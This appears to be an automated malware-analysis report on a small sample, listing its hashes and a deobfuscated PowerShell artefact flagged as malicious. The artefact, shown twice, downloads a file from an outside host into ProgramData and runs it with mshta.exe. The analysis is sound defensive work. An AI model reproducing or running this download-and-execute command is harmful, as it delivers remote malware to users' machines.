Characteristics
| Hash | Hash Value |
|---|---|
| MD5 | a1fdf665dab23f6c0961033990a37faf |
| SHA1 | 78f0c3bd359ab30dd237e5a099abe63ea81b6255 |
| SHA256 | b55c72632ad93fa35a1e414a06f3ae266ff0a360748d79f5df0c5a9af35d3279 |
| SHA384 | 9966b1b99fa73c8c878ba94a63685edb7ebb5dd1cf6d008ac14d93fae8996aca4ff16a9804625c7d41a7bb2a37102329 |
| SHA512 | 8ad1ff8062d45138f4b419a1a592d268e0dfad349d32894842bf005e3e92492b66bd6e48843df9edf250a2224471a2e2ad6c71a8af640edd6140ca3d81a76527 |
| SSDeep | 3:VSJJFISFeBIFgYCDbWKsT1p3hyxHWX7sV2Av:s8SFZCDqhyzT |
File Structure
Artefacts
| Name | Value |
|---|---|
| Deobfuscated PowerShell | $u = "https://bilkaso.com/apd" $p = $env:PROGRAMDATA + "\vc.html" Invoke-WebRequest $u -O $p start "mshta.exe" $p |
a1fdf665dab23f6c0961033990a37faf (121 B)
File Structure
Characteristics
No malware configuration was found at this point.
Artefacts
| Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $u = "https://bilkaso.com/apd" $p = $env:PROGRAMDATA + "\vc.html" Invoke-WebRequest $u -O $p start "mshta.exe" $p Malicious | a1fdf665dab23f6c0961033990a37faf > [PowerShell Command] |